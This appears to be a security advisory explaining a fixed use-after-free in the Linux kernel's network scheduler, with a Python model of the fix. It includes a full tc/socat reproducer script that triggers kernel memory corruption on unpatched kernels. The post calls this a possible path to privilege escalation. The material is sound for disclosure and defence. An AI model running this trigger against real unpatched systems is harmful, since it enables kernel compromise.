In a recent update to the Linux kernel, a vulnerability in the network scheduler (net/sched) subsystem has been resolved. It is a use-after-free (UAF) bug that could potentially be exploited for privilege escalation. Lion Ackermann demonstrated such a UAF with a script consisting of several steps, which are listed later in this post.
The vulnerability revolves around replacing a child qdisc from one parent to another. The Linux kernel now disallows such a replacement, preventing exploitation of this vulnerability. Ackermann's original script demonstrates the vulnerability on a kernel to which the patch has not yet been applied.
To understand and try out Ackermann's script, follow the steps in the listing below (the script targets the loopback device, so it only affects the local host):
# Step 1. create the root qdisc
tc qdisc add dev lo root handle 1: drr
# Step 2. a class for packet aggregation, to demonstrate the UAF
tc class add dev lo classid 1:1 drr
# Step 3. a class for nesting
tc class add dev lo classid 1:2 drr
# Step 4. a class to graft the qdisc to
tc class add dev lo classid 1:3 drr
# Step 5. a plug qdisc (handle 2:) under class 1:1
tc qdisc add dev lo parent 1:1 handle 2: plug limit 1024
# Step 6. a nested drr qdisc (handle 3:) under class 1:2
tc qdisc add dev lo parent 1:2 handle 3: drr
# Step 7. a class inside the nested drr
tc class add dev lo classid 3:1 drr
# Step 8. a pfifo qdisc (handle 4:) under class 3:1
tc qdisc add dev lo parent 3:1 handle 4: pfifo
# Step 9. display the class/qdisc layout
tc class ls dev lo
tc qdisc ls
# Step 10. trigger the bug: move qdisc 4: from class 3:1 to class 1:3 <=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:
# Step 11. redisplay the qdiscs/classes
tc class ls dev lo
tc qdisc ls
# Step 12. send one packet to the plug (priority 0x10001 = classid 1:1)
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
# Step 13. send one packet to the grafted fifo (priority 0x10003 = classid 1:3)
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))
# Step 14. trigger the UAF
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1
The semantics of "replace" describe a delete/add operation on the same node, not a delete from one node (3:1) followed by an add to another node (1:3), as in step 10. While the script could be adapted to the fixed behaviour, the patch prevents such configurations in the first place to avoid possible unforeseen consequences.
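As an added illustration that is not part of the post or of the kernel patch, the following Python model replays the qdisc tree built by the script above and gives "replace" the same-node semantics the fix enforces. QdiscModel, run_scenario and the error text are hypothetical names of this model, which abstracts the kernel's refcounting into an "alive" set plus one child pointer per node.

```python
from dataclasses import dataclass, field

@dataclass
class QdiscModel:
    """Toy qdisc tree; kernel refcounting is abstracted into the 'alive' set."""
    strict: bool = True                         # True = patched 'replace' rule
    alive: set = field(default_factory=set)     # allocated qdisc handles
    child: dict = field(default_factory=dict)   # node (root/class) -> child qdisc
    parent: dict = field(default_factory=dict)  # qdisc handle -> its parent node

    def add_qdisc(self, parent, handle):
        """tc qdisc add ... parent <parent> handle <handle>"""
        self.alive.add(handle)
        self.child[parent] = handle
        self.parent[handle] = parent

    def replace(self, parent, handle):
        """tc qdisc replace ... parent <parent> handle <handle>"""
        if handle in self.alive and self.parent[handle] != parent:
            if self.strict:
                # The fix: replace is delete/add on the same node, never a move.
                raise ValueError("replace cannot move a qdisc to another parent")
            # Unpatched: grafted under the new parent, old pointer never cleared.
        self.child[parent] = handle
        self.parent[handle] = parent

    def delete_class(self, classid):
        """tc class delete ... classid <classid>: frees the class's child qdisc."""
        self.alive.discard(self.child.pop(classid, None))  # discard(None): no-op

    def stale_refs(self):
        """Nodes still pointing at a qdisc handle that has been freed."""
        return sorted(n for n, h in self.child.items() if h not in self.alive)

def run_scenario(strict):
    """Replay steps 1, 5, 6, 8, 10 and 14 of the script; classes from steps
    2-4 and 7 are implicit. Returns (replace_rejected, stale_refs)."""
    t = QdiscModel(strict=strict)
    t.add_qdisc("root", "1:")   # step 1: root drr
    t.add_qdisc("1:1", "2:")    # step 5: plug under class 1:1
    t.add_qdisc("1:2", "3:")    # step 6: nested drr under class 1:2
    t.add_qdisc("3:1", "4:")    # step 8: pfifo under class 3:1
    rejected = False
    try:
        t.replace("1:3", "4:")  # step 10: move 4: from 3:1 to 1:3
    except ValueError:
        rejected = True
    t.delete_class("1:3")       # step 14: frees 4: if 1:3 now owns it
    t.delete_class("1:1")       # frees 2: (the plug)
    return rejected, t.stale_refs()
```

With strict=False the model ends with class 3:1 still pointing at the freed qdisc 4:, the stale reference behind the UAF; with strict=True step 10 is rejected and no stale reference remains.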
This fix is a result of joint work with Lion Ackermann. Make sure to apply the latest Linux kernel updates and patches to avoid potential security risks posed by this and other vulnerabilities.
For other related Linux kernel vulnerability fixes, check out the Linux Kernel Archives.
Timeline
Published on: 02/13/2025 12:15:27 UTC
Last modified on: 03/13/2025 13:15:48 UTC